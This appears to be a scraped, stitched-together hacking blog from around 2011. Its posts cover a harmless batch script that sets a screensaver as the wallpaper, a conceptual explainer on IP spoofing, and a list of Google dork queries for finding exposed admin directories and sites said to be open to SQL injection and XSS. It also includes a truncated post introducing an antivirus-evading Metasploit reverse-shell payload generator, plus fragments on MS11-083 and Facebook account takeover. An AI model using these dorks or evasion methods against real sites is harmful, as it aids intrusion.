3. Suppose you want to set ribbons.scr as your desktop background: type ribbons.scr /p65552 and hit Enter. The screen saver appears immediately as an eye-catching desktop. The bad part is that all the desktop icons disappear and you can't move your mouse over the screen. To bring back your original wallpaper, press ALT+CTRL+DEL, click on the process with the same name as your screen saver background, and click on the End Task button.

If the above mentioned commands are hard and lengthy for you, you can use my batch script to carry out the same task without typing the commands. Just copy the script into Notepad and save it as anything.bat. Remember that the file extension should be .bat

NOTE-The following script only works on WINDOWS 7.



@echo off
title ScreenSaVer as BackgrOund
:Main
echo                      **************************************
Echo                      **************************************
Echo                      **************************************
Echo.                      
Echo                     __Welcome to ScreenSaVer as BackgrOund__
Echo.                    
Echo                      **************************************
Echo                      **************************************
Echo                      **************************************
Echo.
Echo -------------------------------------------------------------------------------

Echo.
Echo Select the ScreeSaver you want as your desktop background.
Echo.
echo 1.Bubbles
Echo 2.Mystify
Echo 3.Ribbons
Echo.
Echo -------------------------------------------------------------------------------
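set /p input=YoUr Ch0ice:
rem Accept either the menu number or the name, case-insensitively
if /i "%input%"=="1" goto Bubbles
if /i "%input%"=="bubbles" goto Bubbles
if /i "%input%"=="2" goto Mystify
if /i "%input%"=="mystify" goto Mystify
if /i "%input%"=="3" goto Ribbons
if /i "%input%"=="ribbons" goto Ribbons
rem Anything else: show the menu again instead of falling through to :Ribbons
cls
goto Main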
:Ribbons
cd C:\windows\system32
ribbons.scr /p65552
cls
Goto Main
:Mystify
cd C:\windows\system32
mystify.scr /p65552
cls
Goto Main
:bubbles
cd c:\windows\system32\
bubbles.scr /p65552
cls
Goto Main



IP SPOOFING: What exactly it is all about.



IP spoofing is one of the most complicated and advanced tricks that can be executed on a remote computer. IP spoofing happens when the attacker tricks the target computer into believing that the packet sent to it comes from a source other than the actual source computer. In other words, it is the process by which an attacker can conceal his/her real identity while attacking the system and make the target computer believe that the data packet sent to it originates at another system.

For example, say your IP address is 127.15.18.1 and the IP address of the target system is 203.87.13.6. Normally, when you send a message to the target system, it detects the IP address of the system from which the message comes. In the case of IP spoofing, the attacker's real IP address (in this case 127.15.18.1) is replaced with a fake IP address, making it difficult for the target computer to trace the attacker back.

Let's take another example. Imagine the following three IP addresses exist:
Attacker: 123.44.77.89 (real)
Victim: 44.55.66.77
Fake: 99.99.99.99

Now if REAL wants to send a data packet to VICTIM's system, the IP address of the attacker will clearly show that REAL has sent the data packet. Therefore, with the help of IP spoofing, REAL will send a data packet to the victim in such a way that it will appear that the data packet has come from the FAKE system. As you see, IP spoofing is used to disguise or hide the source IP of the attacker.

How IP SPOOFING Works-
The reason IP spoofing is regarded as a difficult attack to perform is the fact that it is a blind attack, which means that if you use IP spoofing to attack a computer you receive no feedback or response saying that your attack was successful or, if the attack was unsuccessful, what the reason behind it was. This is because the target computer sends its messages to the spoofed IP address, i.e. the fake IP, rather than your own.

Let's continue with the previous example. The source system (REAL) starts a Three-Way-Handshake connection by sending a SYN packet containing the fake source IP address (FAKE) to the target (VICTIM). VICTIM replies by sending a SYN/ACK packet, but rather than sending it to REAL it sends it to FAKE. To complete the three-way handshake, VICTIM must receive an ACK packet. Because VICTIM sent the SYN/ACK packet to the spoofed IP address, REAL never sees it. To prevent VICTIM from timing out the connection, REAL must bluff by sending an ACK packet (again containing the fake IP address) acknowledging that the SYN/ACK packet was received by FAKE. If the third step completes successfully, a three-way handshake between VICTIM and FAKE completes.

GOOGLE DORKS: Learn how to use Google for Hacking.



Ever wondered how GOOGLE, the world's most popular and powerful search engine, can be used for malicious purposes? Google accepts pre-defined commands as input and produces unbelievable results, which enables hackers, crackers, script kiddies etc. to use the Google search engine to gather confidential or sensitive information that is not visible through common searches. You can find websites vulnerable to SQL Injection, XSS attacks etc.

Google’s Advanced Search Query Syntaxes-

Discussed below are various special Google commands which can be used to dig up some critical juicy information.

[inurl:]
The [inurl:] syntax restricts the search results to those URLs containing the search keyword. "inurl: admin" (without quotes) will return only links to those pages that have "admin" in the URL.

[intitle:]
The [intitle:] syntax restricts the search results to the pages containing the word in their title. For example, "intitle: administrator password" (without quotes) will give links to all the pages which have "administrator" in their title and the word "password" anywhere in the page.

[link:]
The link syntax will give the pages that have a link to a specified webpage. For example, "link:www.google.com" (without quotes) will list web pages that have a link pointing to Google's homepage.

[related:]
The related syntax will give you the webpages which are similar to a specified webpage. For example, "related:www.google.com" will list the webpages that are similar to Google's homepage.

[phonebook:]
"phonebook" searches for US phone number information. For example, "phonebook:jack+LA" will list all the names which have JACK in them and live in Los Angeles (LA).

[filetype:]
Using the "filetype:" syntax, Google searches for a particular file type (i.e. .doc, .exe etc.). For example, "filetype:txt site:gov top secret" (without quotes) will look for files with the ".txt" extension in all the government domains with the .gov extension that contain the words top secret either in the page or in the .txt file.

Looking for vulnerable sites or servers using "intitle:" or "allintitle:"
a.) Using [allintitle: "index of /root"] (without brackets) will give you links to the web servers which give you access to restricted directories like "root" through the web.

b.) Using [allintitle: "index of /admin"] (without brackets) will give you links to the websites which have indexed browsing enabled for restricted directories like "admin".


Other interesting Search Queries

To search for sites vulnerable to Cross-Site Scripting (XSS) attacks:
allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php

To search for sites vulnerable to SQL Injection attacks:
allinurl:/privmsg.php
inurl:trainers.php?id=
inurl:play_old.php?id=

Friday 11 November 2011

FUD Payload Generator for Backtrack By Coresec.org







Today, based on Astr0baby’s article on how we can create a fully undetectable Metasploit payload, I modified his REVERSE_TCP Payload Generator in order to work with the Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:



#!/bin/bash
echo "************************************************************"
echo " Automatic

MS11-083 Details And Honeypot.





Microsoft Security Bulletin MS11-083 - Critical


Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)


Executive Summary
This security update resolves a privately reported vulnerability in
Microsoft Windows. The vulnerability could allow remote code execution
if an attacker sends a continuous flow of specially crafted UDP packets
to a closed port on a target system.

The

Tuesday 1 November 2011

Creating executable of Shell Script

By Nikesh Jauhari










Many times it happens that the shell scripts we write contain sensitive
information like passwords or some sort of keys or paths to some
sensitive files, and if you are running such a script it becomes very easy for
a normal user to have a look inside the script and get the sensitive
information from the code.
There is a program called "shc" which can provide the

Exploiting “Facebook Trusted Friend” Security Feature

In Facebook’s case, the keys are codes, and the user can choose from three to five “Trusted friends”
who are then provided with a code. If you ever get locked out of your
account (and you can’t access your email to follow the link after
resetting your Facebook password), you gather all the codes and use them
to gain access to it again.  This method is used by hackers to hack
most of the